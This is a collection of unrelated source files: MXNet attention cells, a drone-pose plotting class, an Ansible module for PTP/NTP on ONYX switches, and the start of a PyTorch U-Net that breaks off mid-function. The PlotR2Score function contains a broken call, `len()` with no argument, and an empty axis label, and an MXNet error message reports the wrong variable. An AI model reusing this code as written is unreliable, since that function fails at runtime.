Initializer of the bias.
prefix : str or None, default None
See document of `Block`.
params : str or None, default None
See document of `Block`.
"""
def __init__(self, base_cell, query_units, key_units, value_units, num_heads, use_bias=True,
weight_initializer=None, bias_initializer='zeros', prefix=None, params=None):
super(MultiHeadAttentionCell, self).__init__(prefix=prefix, params=params)
self._base_cell = base_cell
self._query_units = query_units
self._key_units = key_units
self._value_units = value_units
self._num_heads = num_heads
self._use_bias = use_bias
if self._query_units % self._num_heads != 0:
raise ValueError('In MultiHeadAttetion, the query_units should be divided exactly'
' by the number of heads. Received query_units={}, num_heads={}'
.format(key_units, num_heads))
if self._key_units % self._num_heads != 0:
raise ValueError('In MultiHeadAttetion, the key_units should be divided exactly'
' by the number of heads. Received key_units={}, num_heads={}'
.format(key_units, num_heads))
if self._value_units % self._num_heads != 0:
raise ValueError('In MultiHeadAttetion, the value_units should be divided exactly'
' by the number of heads. Received value_units={}, num_heads={}'
.format(value_units, num_heads))
with self.name_scope():
self.proj_query = nn.Dense(units=self._query_units, use_bias=self._use_bias,
flatten=False, weight_initializer=weight_initializer,
bias_initializer=bias_initializer, prefix='query_')
self.proj_key = nn.Dense(units=self._key_units, use_bias=self._use_bias,
flatten=False, weight_initializer=weight_initializer,
bias_initializer=bias_initializer, prefix='key_')
self.proj_value = nn.Dense(units=self._value_units, use_bias=self._use_bias,
flatten=False, weight_initializer=weight_initializer,
bias_initializer=bias_initializer, prefix='value_')
def __call__(self, query, key, value=None, mask=None):
"""Compute the attention.
Parameters
----------
query : Symbol or NDArray
Query vector. Shape (batch_size, query_length, query_dim)
key : Symbol or NDArray
Key of the memory. Shape (batch_size, memory_length, key_dim)
value : Symbol or NDArray or None, default None
Value of the memory. If set to None, the value will be set as the key.
Shape (batch_size, memory_length, value_dim)
mask : Symbol or NDArray or None, default None
Mask of the memory slots. Shape (batch_size, query_length, memory_length)
Only contains 0 or 1 where 0 means that the memory slot will not be used.
If set to None. No mask will be used.
Returns
-------
context_vec : Symbol or NDArray
Shape (batch_size, query_length, context_vec_dim)
att_weights : Symbol or NDArray
Attention weights of multiple heads.
Shape (batch_size, num_heads, query_length, memory_length)
"""
return super(MultiHeadAttentionCell, self).__call__(query, key, value, mask)
def _compute_weight(self, F, query, key, mask=None):
query = self.proj_query(query) # Shape (batch_size, query_length, query_units)
# Shape (batch_size * num_heads, query_length, ele_units)
query = F.transpose(query.reshape(shape=(0, 0, self._num_heads, -1)),
axes=(0, 2, 1, 3))\
.reshape(shape=(-1, 0, 0), reverse=True)
key = self.proj_key(key)
key = F.transpose(key.reshape(shape=(0, 0, self._num_heads, -1)),
axes=(0, 2, 1, 3)).reshape(shape=(-1, 0, 0), reverse=True)
if mask is not None:
mask = F.broadcast_axis(F.expand_dims(mask, axis=1),
axis=1, size=self._num_heads)\
.reshape(shape=(-1, 0, 0), reverse=True)
att_weights = self._base_cell._compute_weight(F, query, key, mask)
return att_weights.reshape(shape=(-1, self._num_heads, 0, 0), reverse=True)
def _read_by_weight(self, F, att_weights, value):
att_weights = att_weights.reshape(shape=(-1, 0, 0), reverse=True)
value = self.proj_value(value)
value = F.transpose(value.reshape(shape=(0, 0, self._num_heads, -1)),
axes=(0, 2, 1, 3)).reshape(shape=(-1, 0, 0), reverse=True)
context_vec = self._base_cell._read_by_weight(F, att_weights, value)
context_vec = F.transpose(context_vec.reshape(shape=(-1, self._num_heads, 0, 0),
reverse=True),
axes=(0, 2, 1, 3)).reshape(shape=(0, 0, -1))
return context_vec
class MLPAttentionCell(AttentionCell):
r"""Concat the query and the key and use a single-hidden-layer MLP to get the attention score.
We provide two mode, the standard mode and the normalized mode.
In the standard mode::
score = v tanh(W [h_q, h_k] + b)
In the normalized mode (Same as TensorFlow)::
score = g v / ||v||_2 tanh(W [h_q, h_k] + b)
This type of attention is first proposed in
.. Bahdanau et al., Neural Machine Translation by Jointly Learning to Align and Translate.
ICLR 2015
Parameters
----------
units : int
act : Activation, default nn.Activation('tanh')
normalized : bool, default False
Whether to normalize the weight that maps the embedded
hidden states to the final score. This strategy can be interpreted as a type of
"[NIPS2016] Weight Normalization".
dropout : float, default 0.0
Attention dropout.
weight_initializer : str or `Initializer` or None, default None
Initializer of the weights.
bias_initializer : str or `Initializer`, default 'zeros'
Initializer of the bias.
prefix : str or None, default None
See document of `Block`.
params : ParameterDict or None, default None
See document of `Block`.
"""
def __init__(self, units, act=nn.Activation('tanh'), normalized=False, dropout=0.0,
weight_initializer=None, bias_initializer='zeros', prefix=None, params=None):
# Define a temporary class to implement the normalized version
# TODO(sxjscience) Find a better solution
class _NormalizedScoreProj(HybridBlock):
def __init__(self, in_units, weight_initializer=None, prefix=None, params=None):
super(_NormalizedScoreProj, self).__init__(prefix=prefix, params=params)
self.g = self.params.get('g', shape=(1,),
init=mx.init.Constant(1.0 / math.sqrt(in_units)),
allow_deferred_init=True)
self.v = self.params.get('v', shape=(1, in_units),
init=weight_initializer,
allow_deferred_init=True)
def hybrid_forward(self, F, x, g, v): # pylint: disable=arguments-differ
v = F.broadcast_div(v, F.sqrt(F.dot(v, v, transpose_b=True)))
weight = F.broadcast_mul(g, v)
out = F.FullyConnected(x, weight, None, no_bias=True, num_hidden=1,
flatten=False, name='fwd')
return out
super(MLPAttentionCell, self).__init__(prefix=prefix, params=params)
self._units = units
self._act = act
self._normalized = normalized
self._dropout = dropout
with self.name_scope():
self._dropout_layer = nn.Dropout(dropout)
self._query_mid_layer = nn.Dense(units=self._units, flatten=False, use_bias=True,
weight_initializer=weight_initializer,
bias_initializer=bias_initializer,
prefix='query_')
self._key_mid_layer = nn.Dense(units=self._units, flatten=False, use_bias=False,
weight_initializer=weight_initializer,
prefix='key_')
if self._normalized:
self._attention_score = \
_NormalizedScoreProj(in_units=units,
weight_initializer=weight_initializer,
prefix='score_')
else:
self._attention_score = nn.Dense(units=1, in_units=self._units,
flatten=False, use_bias=False,
weight_initializer=weight_initializer,
prefix='score_')
def _compute_weight(self, F, query, key, mask=None):
mapped_query = self._query_mid_layer(query)
mapped_key = self._key_mid_layer(key)
mid_feat = F.broadcast_add(F.expand_dims(mapped_query, axis=2),
F.expand_dims(mapped_key, axis=1))
mid_feat = self._act(mid_feat)
att_score = self._attention_score(mid_feat).reshape(shape=(0, 0, 0))
att_weights = self._dropout_layer(_masked_softmax(F, att_score, mask))
return att_weights
class DotProductAttentionCell(AttentionCell):
r"""Dot product attention between the query and the key.
Depending on parameters, defined as::
units is None:
score = <h_q, h_k>
units is not None and luong_style is False:
score = <W_q h_q, W_k h_k>
units is not None and luong_style is True:
score = <W h_q, h_k>
Parameters
----------
units: int or None, default None
Project the query and key to vectors with `units` dimension
before applying the attention. If set to None,
the query vector and the key vector are directly used to compute the attention and
should have the same dimension::
If the units is None,
score = <h_q, h_k>
Else if the units is not None and luong_style is False:
score = <W_q h_q, W_k, h_k>
Else if the units is not None and luong_style is True:
score = <W h_q, h_k>
luong_style: bool, default False
If turned on, the score will be::
score = <W h_q, h_k>
`units` must be the same as the dimension of the key vector
scaled: bool, default True
Whether to divide the attention weights by the sqrt of the query dimension.
This is first proposed in "[NIPS2017] Attention is all you need."::
score = <h_q, h_k> / sqrt(dim_q)
normalized: bool, default False
If turned on, the cosine distance is used, i.e::
score = <h_q / ||h_q||, h_k / ||h_k||>
use_bias : bool, default True
Whether to use bias in the projection layers.
dropout : float, default 0.0
Attention dropout
weight_initializer : str or `Initializer` or None, default None
Initializer of the weights
bias_initializer : str or `Initializer`, default 'zeros'
Initializer of the bias
prefix : str or None, default None
See document of `Block`.
params : str or None, default None
See document of `Block`.
"""
def __init__(self, units=None, luong_style=False, scaled=True, normalized=False, use_bias=True,
dropout=0.0, weight_initializer=None, bias_initializer='zeros',
prefix=None, params=None):
super(DotProductAttentionCell, self).__init__(prefix=prefix, params=params)
self._units = units
self._scaled = scaled
self._normalized = normalized
self._use_bias = use_bias
self._luong_style = luong_style
self._dropout = dropout
if self._luong_style:
assert units is not None, 'Luong style attention is not available without explicitly ' \
'setting the units'
with self.name_scope():
self._dropout_layer = nn.Dropout(dropout)
if units is not None:
with self.name_scope():
self._proj_query = nn.Dense(units=self._units, use_bias=self._use_bias,
flatten=False, weight_initializer=weight_initializer,
bias_initializer=bias_initializer, prefix='query_')
if not self._luong_style:
self._proj_key = nn.Dense(units=self._units, use_bias=self._use_bias,
flatten=False, weight_initializer=weight_initializer,
bias_initializer=bias_initializer, prefix='key_')
if self._normalized:
with self.name_scope():
self._l2_norm = L2Normalization(axis=-1)
def _compute_weight(self, F, query, key, mask=None):
if self._units is not None:
query = self._proj_query(query)
if not self._luong_style:
key = self._proj_key(key)
elif F == mx.nd:
assert query.shape[-1] == key.shape[-1], 'Luong style attention requires key to ' \
'have the same dim as the projected ' \
'query. Received key {}, query {}.'.format(
key.shape, query.shape)
if self._normalized:
query = self._l2_norm(query)
key = self._l2_norm(key)
if self._scaled:
query = F.contrib.div_sqrt_dim(query)
att_score = F.batch_dot(query, key, transpose_b=True)
att_weights = self._dropout_layer(_masked_softmax(F, att_score, mask))
return att_weights
|
the-stack_0_25265
|
import matplotlib.pyplot as plt
import torch
import matplotlib.gridspec as gridspec
import numpy as np
import cv2
import matplotlib.image as mpimg
class DataVisualization:
figure_counter = 0
folderPath = "Results/"
desc = ""
@staticmethod
def PlotLoss(train_losses_x, train_losses_y, train_losses_z, train_losses_phi , valid_losses_x, valid_losses_y, valid_losses_z, valid_losses_phi):
epochs = range(1, len(train_losses_x) + 1)
DataVisualization.figure_counter += 1
plt.figure(DataVisualization.figure_counter, figsize=(20, 12))
plt.margins(0.1)
gs = gridspec.GridSpec(2, 2)
ax = plt.subplot(gs[0, 0])
ax.set_title('x')
plt.plot(epochs, train_losses_x, color='green', label='Training loss')
plt.plot(epochs, valid_losses_x, color='black', label='Validation loss')
plt.legend()
ax = plt.subplot(gs[0, 1])
ax.set_title('y')
plt.plot(epochs, train_losses_y, color='blue', label='Training loss')
plt.plot(epochs, valid_losses_y, color='black', label='Validation loss')
plt.legend()
ax = plt.subplot(gs[1, 0])
ax.set_title('z')
plt.plot(epochs, train_losses_z, color='r', label='Training loss')
plt.plot(epochs, valid_losses_z, color='black', label='Validation loss')
plt.legend()
ax = plt.subplot(gs[1, 1])
ax.set_title('phi')
plt.plot(epochs, train_losses_phi, color='m', label='Training loss')
plt.plot(epochs, valid_losses_phi, color='black', label='Validation loss')
plt.legend()
plt.subplots_adjust(hspace=0.3)
plt.suptitle('Learning curves')
plt.xlabel('Epoch')
plt.ylabel('Loss')
plt.savefig(DataVisualization.folderPath + DataVisualization.desc +'LearningCurves.png')
@staticmethod
def PlotMSE(MSE):
DataVisualization.figure_counter += 1
plt.figure(DataVisualization.figure_counter, figsize=(10, 6))
epochs = range(1, len(MSE) + 1)
MSE = torch.stack(MSE, 0)
x = MSE[:, 0]
x = x.cpu().numpy()
plt.plot(epochs, x, color='green', label='x')
y = MSE[:, 1]
y = y.cpu().numpy()
plt.plot(epochs, y, color='blue', label='y')
z = MSE[:, 2]
z = z.cpu().numpy()
plt.plot(epochs, z, color='r', label='z')
phi = MSE[:, 3]
phi = phi.cpu().numpy()
plt.plot(epochs, phi, color='m', label='phi')
plt.legend()
plt.title('Pose Variables MSE')
plt.xlabel('Epoch')
plt.ylabel('MSE')
plt.xticks(np.arange(0, len(MSE), step=5))
plt.savefig(DataVisualization.folderPath + DataVisualization.desc + 'MSE.png')
@staticmethod
def PlotMAE(MAE):
DataVisualization.figure_counter += 1
plt.figure(DataVisualization.figure_counter, figsize=(10, 6))
epochs = range(1, len(MAE) + 1)
MAE = torch.stack(MAE, 0)
x = MAE[:, 0]
x = x.cpu().numpy()
plt.plot(epochs, x, color='green', label='x')
y = MAE[:, 1]
y = y.cpu().numpy()
plt.plot(epochs, y, color='blue', label='y')
z = MAE[:, 2]
z = z.cpu().numpy()
plt.plot(epochs, z, color='r', label='z')
phi = MAE[:, 3]
phi = phi.cpu().numpy()
plt.plot(epochs, phi, color='m', label='phi')
plt.legend()
plt.title('Pose Variables MAE')
plt.xlabel('Epoch')
plt.ylabel('MAE')
plt.xticks(np.arange(0, len(MAE), step=5))
plt.savefig(DataVisualization.folderPath + DataVisualization.desc + 'MAE.png')
@staticmethod
def PlotR2Score(r2_score):
DataVisualization.figure_counter += 1
plt.figure(DataVisualization.figure_counter, figsize=(10, 6))
epochs = range(1, len(r2_score) + 1)
r2_score = torch.stack(r2_score, 0)
x = r2_score[:, 0]
x = x.cpu().numpy()
plt.plot(epochs, x, color='green', label='x')
y = r2_score[:, 1]
y = y.cpu().numpy()
plt.plot(epochs, y, color='blue', label='y')
z = r2_score[:, 2]
z = z.cpu().numpy()
plt.plot(epochs, z, color='r', label='z')
phi = r2_score[:, 3]
phi = phi.cpu().numpy()
plt.plot(epochs, phi, color='m', label='phi')
plt.legend()
plt.title('Pose Variables ')
plt.xlabel('Epoch')
plt.ylabel('')
plt.xticks(np.arange(0, len(), step=5))
plt.savefig(DataVisualization.folderPath + DataVisualization.desc + 'Rsq.png')
@staticmethod
def PlotGTandEstimationVsTime(gt_labels, predictions):
DataVisualization.figure_counter += 1
plt.figure(DataVisualization.figure_counter, figsize=(20, 12))
plt.margins(0.1)
gt_labels = torch.stack(gt_labels, 0)
predictions = torch.stack(predictions, 0)
gt_labels = gt_labels.cpu().numpy()
gt_labels = np.reshape(gt_labels, (-1, 4))
predictions = predictions.cpu().numpy()
predictions = np.reshape(predictions, (-1, 4))
samples = len(gt_labels[:, 0])
samples = range(1, samples+1)
gs = gridspec.GridSpec(2, 2)
ax = plt.subplot(gs[0, 0])
ax.set_title('x')
x_gt = gt_labels[:, 0]
x_pred = predictions[:, 0]
plt.plot(samples, x_gt, color='green', label='GT')
plt.plot(samples, x_pred, color='black', label='Prediction')
plt.legend()
ax = plt.subplot(gs[0, 1])
ax.set_title('y')
y_gt = gt_labels[:, 1]
y_pred = predictions[:, 1]
plt.plot(samples, y_gt, color='blue', label='GT')
plt.plot(samples, y_pred, color='black', label='Prediction')
plt.legend()
ax = plt.subplot(gs[1, 0])
ax.set_title('z')
z_gt = gt_labels[:, 2]
z_pred = predictions[:, 2]
plt.plot(samples, z_gt, color='r', label='GT')
plt.plot(samples, z_pred, color='black', label='Prediction')
plt.legend()
ax = plt.subplot(gs[1, 1])
ax.set_title('phi')
phi_gt = gt_labels[:, 3]
phi_pred = predictions[:, 3]
plt.plot(samples, phi_gt, color='m', label='GT')
plt.plot(samples, phi_pred, color='black', label='Prediction')
plt.legend()
plt.subplots_adjust(hspace=0.3)
plt.suptitle('Ground Truth and Predictions vs time')
plt.savefig(DataVisualization.folderPath + DataVisualization.desc + 'GTandPredVsTime.png')
@staticmethod
def PlotBebopandHimaxVsTime(bebop_output, himax_output):
DataVisualization.figure_counter += 1
plt.figure(DataVisualization.figure_counter, figsize=(20, 12))
plt.margins(0.1)
#gt_labels = torch.stack(gt_labels, 0)
#predictions = torch.stack(predictions, 0)
#gt_labels = gt_labels.cpu().numpy()
#gt_labels = np.reshape(gt_labels, (-1, 4))
#predictions = predictions.cpu().numpy()
#predictions = np.reshape(predictions, (-1, 4))
samples = len(bebop_output[:, 0])
samples = range(1, samples + 1)
gs = gridspec.GridSpec(2, 2)
ax = plt.subplot(gs[0, 0])
ax.set_title('x')
x_gt = bebop_output[:, 0]
x_pred = himax_output[:, 0]
plt.plot(samples, x_gt, color='green', label='bebop_output')
plt.plot(samples, x_pred, color='black', label='himax_output')
plt.legend()
ax = plt.subplot(gs[0, 1])
ax.set_title('y')
y_gt = bebop_output[:, 1]
y_pred = himax_output[:, 1]
plt.plot(samples, y_gt, color='blue', label='bebop_output')
plt.plot(samples, y_pred, color='black', label='himax_output')
plt.legend()
ax = plt.subplot(gs[1, 0])
ax.set_title('z')
z_gt = bebop_output[:, 2]
z_pred = himax_output[:, 2]
plt.plot(samples, z_gt, color='r', label='bebop_output')
plt.plot(samples, z_pred, color='black', label='himax_output')
plt.legend()
ax = plt.subplot(gs[1, 1])
ax.set_title('phi')
phi_gt = bebop_output[:, 3]
phi_pred = himax_output[:, 3]
plt.plot(samples, phi_gt, color='m', label='bebop_output')
plt.plot(samples, phi_pred, color='black', label='himax_output')
plt.legend()
plt.subplots_adjust(hspace=0.3)
plt.suptitle('bebop output and himax output vs time')
plt.savefig(DataVisualization.folderPath + DataVisualization.desc + 'bebopandhimaxVsTime.png')
@staticmethod
def DisplayPlots():
plt.show()
@staticmethod
def PlotGTVsEstimation(gt_labels, predictions):
DataVisualization.figure_counter += 1
plt.figure(DataVisualization.figure_counter, figsize=(20, 12))
gt_labels = torch.stack(gt_labels, 0)
predictions = torch.stack(predictions, 0)
gt_labels = gt_labels.cpu().numpy()
gt_labels = np.reshape(gt_labels, (-1, 4))
predictions = predictions.cpu().numpy()
predictions = np.reshape(predictions, (-1, 4))
gs = gridspec.GridSpec(2, 2)
ax = plt.subplot(gs[0, 0])
ax.set_title('x')
ax.set_xmargin(0.2)
x_gt = gt_labels[:, 0]
x_pred = predictions[:, 0]
plt.scatter(x_gt, x_pred, color='green', marker='o')
plt.plot(x_gt, x_gt, color='black', linestyle='--')
plt.legend()
ax = plt.subplot(gs[0, 1])
ax.set_title('y')
ax.set_xmargin(0.2)
y_gt = gt_labels[:, 1]
y_pred = predictions[:, 1]
plt.scatter(y_gt, y_pred, color='blue', marker='o')
plt.plot(y_gt, y_gt, color='black', linestyle='--')
plt.legend()
ax = plt.subplot(gs[1, 0])
ax.set_title('z')
ax.set_xmargin(0.2)
z_gt = gt_labels[:, 2]
z_pred = predictions[:, 2]
plt.scatter(z_gt, z_pred, color='r', marker='o')
plt.plot(z_gt, z_gt, color='black', linestyle='--')
plt.legend()
ax = plt.subplot(gs[1, 1])
ax.set_title('phi')
ax.set_xmargin(0.2)
phi_gt = gt_labels[:, 3]
phi_pred = predictions[:, 3]
plt.scatter(phi_gt, phi_pred, color='m', marker='o')
plt.plot(phi_gt, phi_gt, color='black', linestyle='--')
plt.legend()
plt.subplots_adjust(hspace=0.3)
plt.suptitle('Ground Truth vs Predictions')
plt.savefig(DataVisualization.folderPath + DataVisualization.desc + 'GTvsPred.png')
@staticmethod
def DisplayFrameAndPose(frame, gt_labels, predictions):
#DataVisualization.figure_counter += 1
fig = plt.figure(666, figsize=(10, 6))
w = 20
h = 12
bar_length = h - 2
offset_x = int((w-bar_length)/2)
ax1 = plt.subplot2grid((h, w), (0, offset_x), colspan=bar_length)
ax1.set_title('x')
ax1.xaxis.tick_top()
x_gt = gt_labels[0]
x_pred = predictions[0]
ax1.set_xlim([0, 4])
ax1.set_ylim([-0.5, 0.5])
ax1.set_yticklabels([])
plt.scatter(x_gt, -0.05, color='green', label='GT', s=100)
plt.scatter(x_pred, 0.05, color='blue', label='Prediction', s=100)
ax2 = plt.subplot2grid((h, w), (1, 0), rowspan=bar_length)
ax2.set_title('y')
y_gt = gt_labels[1]
y_pred = predictions[1]
ax2.set_ylim([-1, 1])
ax2.set_xlim([-0.5, 0.5])
ax2.set_xticklabels([])
plt.scatter(-0.05, y_gt, color='green', label='GT', s=100)
plt.scatter(0.05, y_pred, color='blue', label='Prediction', s=100)
ax3 = plt.subplot2grid((h, w), (1, 1), rowspan=bar_length, colspan=(w-2))
ax3.axis('off')
frame = frame.transpose(1, 2, 0)
frame = frame.astype(np.uint8)
plt.imshow(frame)
ax4 = plt.subplot2grid((h, w), (1, w-1), rowspan=bar_length)
ax4.set_title('z')
z_gt = gt_labels[2]
z_pred = predictions[2]
ax4.yaxis.tick_right()
ax4.set_ylim([-1, 1])
ax4.set_xlim([-0.5, 0.5])
ax4.set_xticklabels([])
plt.scatter(-0.05, z_gt, color='green', label='GT', s=100)
plt.scatter(0.05, z_pred, color='blue', label='Prediction', s=100)
ax5 = plt.subplot2grid((h, w), (h-1, offset_x), colspan=bar_length)
ax5.set_title('phi')
phi_gt = gt_labels[3]
phi_pred = predictions[3]
ax5.set_xlim([-2, 2])
ax5.set_ylim([-0.5, 0.5])
ax5.set_yticklabels([])
plt.scatter(phi_gt, -0.05, color='green', label='GT', s=100)
plt.scatter(phi_pred, 0.05, color='blue', label='Prediction', s=100)
plt.subplots_adjust(hspace=1.5)
plt.legend(bbox_to_anchor=(1.05, 1), loc=2, borderaxespad=0.)
return fig
# plt.savefig(DataVisualization.folderPath + DataVisualization.desc + 'GTandPredandPose.png')
@staticmethod
def CoolDroneStuff(frame, gt_labels, predictions):
fig = plt.figure(888, figsize=(15, 5))
img = mpimg.imread('minidrone.jpg')
frame = frame.transpose(1, 2, 0)
frame = frame.astype(np.uint8)
h = 5
w = 15
x_gt = gt_labels[0]
x_pred = predictions[0]
y_gt = gt_labels[1]
y_pred = predictions[1]
z_gt = gt_labels[2]
z_pred = predictions[2]
phi_gt = gt_labels[3] - np.pi/2
phi_pred = predictions[3] - np.pi/2
str1 = "x_gt={:05.3f}, y_gt={:05.3f}, z_gt={:05.3f}, phi_gt={:05.3f}".format(x_gt, y_gt, z_gt, phi_gt)
str2 = "x_pr={:05.3f}, y_pr={:05.3f}, z_pr={:05.3f}, phi_pr={:05.3f}".format(x_pred, y_pred, z_pred, phi_pred)
ax0 = plt.subplot2grid((h, w), (0, 0), colspan=6)
ax0.axis('off')
ax0.text(0, 1.5, str1, fontsize=10)
ax0.text(0, 1, str2, fontsize=10)
ax1 = plt.subplot2grid((h, w), (1, 0), colspan=7, rowspan=4)
ax1.set_title('Relative Pose (x,y)')
ax1.set_xlim([-3, 3])
ax1.set_ylim([0, 3])
ax1.yaxis.set_ticks([0, 1.5, 3]) # set y-ticks
ax1.xaxis.set_ticks([-3.0, -1.5, 0, 1.5, 3.0]) # set y-ticks
ax1.xaxis.tick_top() # and move the X-Axis
ax1.yaxis.tick_left() # remove right y-Ticks
ax1.spines['right'].set_visible(False)
ax1.spines['bottom'].set_visible(False)
trianglex = [3, 0, -3, 3]
triangley = [3, 0, 3, 3]
plt.fill(trianglex, triangley, facecolor='lightskyblue')
plt.plot(y_gt, x_gt, color='green', label='GT', linestyle='None', marker='o', markersize=10)
plt.plot(y_pred, x_pred, color='blue', label='Prediction', linestyle='None', marker='o', markersize=10)
ax1.arrow(y_gt, x_gt, np.cos(phi_gt), np.sin(phi_gt), head_width=0.05, head_length=0.05, color='green')
ax1.arrow(y_pred, x_pred, np.cos(phi_pred), np.sin(phi_pred), head_width=0.05, head_length=0.05, color='blue')
plt.legend(loc='lower right', bbox_to_anchor=(0.8, 0.2, 0.25, 0.25))
ax2 = plt.subplot2grid((h, w), (1, 7), rowspan=4)
ax2.set_title('Relative z', pad=20)
ax2.yaxis.tick_right()
ax2.set_ylim([-1, 1])
ax2.set_xlim([-0.5, 0.5])
ax2.set_xticklabels([])
ax2.yaxis.set_ticks([-1, 0, 1]) # set y-ticks
ax2.xaxis.set_ticks_position('none')
plt.scatter(-0.05, z_gt, color='green', label='GT', s=100)
plt.scatter(0.05, z_pred, color='blue', label='Prediction', s=100)
ax3 = plt.subplot2grid((h, w), (1, 8), rowspan=4, colspan=7)
ax3.set_title('Frame', pad=25)
ax3.axis('off')
plt.imshow(frame)
plt.subplots_adjust(wspace=1.5)
newax = fig.add_axes([0.248, 0.0, 0.1, 0.1], anchor='S')
newax.imshow(img)
newax.axis('off')
@staticmethod
def DisplayVideoFrame(frame):
frame = frame.transpose(1, 2, 0)
frame = frame.astype(np.uint8)
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
cv2.imshow('frame', frame)
cv2.waitKey(10)
@staticmethod
def DisplayDatasetVideo(data):
length = len(data)
for i in range(0, length):
DataVisualization.DisplayVideoFrame(data[i])
|
the-stack_0_25266
|
#!/usr/bin/python
#
# Copyright: Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
DOCUMENTATION = '''
---
module: onyx_ptp_global
author: "Anas Badaha (@anasb)"
short_description: Configures PTP Global parameters
description:
- This module provides declarative management of PTP Global configuration
on Mellanox ONYX network devices.
notes:
- Tested on ONYX 3.6.8130
ptp and ntp protocols cannot be enabled at the same time
options:
ptp_state:
description:
- PTP state.
choices: ['enabled', 'disabled']
default: enabled
ntp_state:
description:
- NTP state.
choices: ['enabled', 'disabled']
domain:
description:
- "set PTP domain number Range 0-127"
primary_priority:
description:
- "set PTP primary priority Range 0-225"
secondary_priority:
description:
- "set PTP secondary priority Range 0-225"
'''
EXAMPLES = """
- name: Configure PTP
onyx_ptp_global:
ntp_state: enabled
ptp_state: disabled
domain: 127
primary_priority: 128
secondary_priority: 128
"""
RETURN = """
commands:
description: The list of configuration mode commands to send to the device.
returned: always
type: list
sample:
- no ntp enable
- protocol ptp
- ptp domain 127
"""
from ansible.module_utils.basic import AnsibleModule
from ansible_collections.mellanox.onyx.plugins.module_utils.network.onyx.onyx import show_cmd
from ansible_collections.mellanox.onyx.plugins.module_utils.network.onyx.onyx import BaseOnyxModule
class OnyxPtpGlobalModule(BaseOnyxModule):
def init_module(self):
""" initialize module
"""
element_spec = dict(
ntp_state=dict(choices=['enabled', 'disabled']),
ptp_state=dict(choices=['enabled', 'disabled'], default='enabled'),
domain=dict(type=int),
primary_priority=dict(type=int),
secondary_priority=dict(type=int)
)
argument_spec = dict()
argument_spec.update(element_spec)
self._module = AnsibleModule(
argument_spec=argument_spec,
supports_check_mode=True)
def get_required_config(self):
module_params = self._module.params
self._required_config = dict(module_params)
self._validate_param_values(self._required_config)
def _validate_param_values(self, obj, param=None):
super(OnyxPtpGlobalModule, self).validate_param_values(obj, param)
if obj['ntp_state'] == 'enabled' and obj['ptp_state'] == 'enabled':
self._module.fail_json(msg='PTP State and NTP State Can not be enabled at the same time')
def validate_domain(self, value):
if value and not 0 <= int(value) <= 127:
self._module.fail_json(msg='domain must be between 0 and 127')
def validate_primary_priority(self, value):
if value and not 0 <= int(value) <= 255:
self._module.fail_json(msg='Primary Priority must be between 0 and 255')
def validate_secondary_priority(self, value):
if value and not 0 <= int(value) <= 255:
self._module.fail_json(msg='Secondary Priority must be between 0 and 255')
def _set_ntp_config(self, ntp_config):
ntp_config = ntp_config[0]
if not ntp_config:
return
ntp_state = ntp_config.get('NTP enabled')
if ntp_state == "yes":
self._current_config['ntp_state'] = "enabled"
else:
self._current_config['ntp_state'] = "disabled"
def _set_ptp_config(self, ptp_config):
if ptp_config is None:
self._current_config['ptp_state'] = 'disabled'
else:
self._current_config['ptp_state'] = 'enabled'
self._current_config['domain'] = int(ptp_config['Domain'])
self._current_config['primary_priority'] = int(ptp_config['Priority1'])
self._current_config['secondary_priority'] = int(ptp_config['Priority2'])
def _show_ntp_config(self):
cmd = "show ntp configured"
return show_cmd(self._module, cmd, json_fmt=True, fail_on_error=False)
def _show_ptp_config(self):
cmd = "show ptp clock"
return show_cmd(self._module, cmd, json_fmt=True, fail_on_error=False)
def load_current_config(self):
self._current_config = dict()
ntp_config = self._show_ntp_config()
self._set_ntp_config(ntp_config)
ptp_config = self._show_ptp_config()
self._set_ptp_config(ptp_config)
def generate_commands(self):
ntp_state = self._required_config.get("ntp_state")
if ntp_state == "enabled":
self._enable_ntp()
elif ntp_state == "disabled":
self._disable_ntp()
ptp_state = self._required_config.get("ptp_state", "enabled")
if ptp_state == "enabled":
self._enable_ptp()
else:
self._disable_ptp()
domain = self._required_config.get("domain")
if domain is not None:
curr_domain = self._current_config.get("domain")
if domain != curr_domain:
self._commands.append('ptp domain %d' % domain)
primary_priority = self._required_config.get("primary_priority")
if primary_priority is not None:
curr_primary_priority = self._current_config.get("primary_priority")
if primary_priority != curr_primary_priority:
self._commands.append('ptp priority1 %d' % primary_priority)
secondary_priority = self._required_config.get("secondary_priority")
if secondary_priority is not None:
curr_secondary_priority = self._current_config.get("secondary_priority")
if secondary_priority != curr_secondary_priority:
self._commands.append('ptp priority2 %d' % secondary_priority)
def _enable_ptp(self):
curr_ptp_state = self._current_config['ptp_state']
if curr_ptp_state == 'disabled':
self._commands.append('protocol ptp')
def _disable_ptp(self):
curr_ptp_state = self._current_config['ptp_state']
if curr_ptp_state == 'enabled':
self._commands.append('no protocol ptp')
def _enable_ntp(self):
curr_ntp_state = self._current_config.get('ntp_state')
if curr_ntp_state == 'disabled':
self._commands.append('ntp enable')
def _disable_ntp(self):
curr_ntp_state = self._current_config['ntp_state']
if curr_ntp_state == 'enabled':
self._commands.append('no ntp enable')
def main():
""" main entry point for module execution
"""
OnyxPtpGlobalModule.main()
if __name__ == '__main__':
main()
|
the-stack_0_25270
|
# Copyright (C) 2020-2021 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
"""You may copy this file as the starting point of your own model."""
import torch
import torch.nn as nn
import torch.nn.functional as F
def soft_dice_loss(output, target):
"""Dice loss function."""
num = target.size(0)
m1 = output.view(num, -1)
m2 = target.view(num, -1)
intersection = (m1 * m2)
score = 2. * (intersection.sum(1) + 1) / (m1.sum(1) + m2.sum(1) + 1)
score = 1 - score.sum() / num
return score
def soft_dice_coef(output, target):
"""Dice coef metric function."""
num = target.size(0)
m1 = output.view(num, -1)
m2 = target.view(num, -1)
intersection = (m1 * m2)
score = 2. * (intersection.sum(1) + 1) / (m1.sum(1) + m2.sum(1) + 1)
return score.sum()
class DoubleConv(nn.Module):
"""Convolutions with BN and activation."""
def __init__(self, in_ch, out_ch):
"""Initialize.
Args:
in_ch: number of input channels
out_ch: number of output channels
"""
super(DoubleConv, self).__init__()
self.in_ch = in_ch
self.out_ch = out_ch
self.conv = nn.Sequential(
nn.Conv2d(in_ch, out_ch, 3, padding=1),
nn.BatchNorm2d(out_ch),
nn.ReLU(inplace=True),
nn.Conv2d(out_ch, out_ch, 3, padding=1),
nn.BatchNorm2d(out_ch),
nn.ReLU(inplace=True)
)
def forward(self, x):
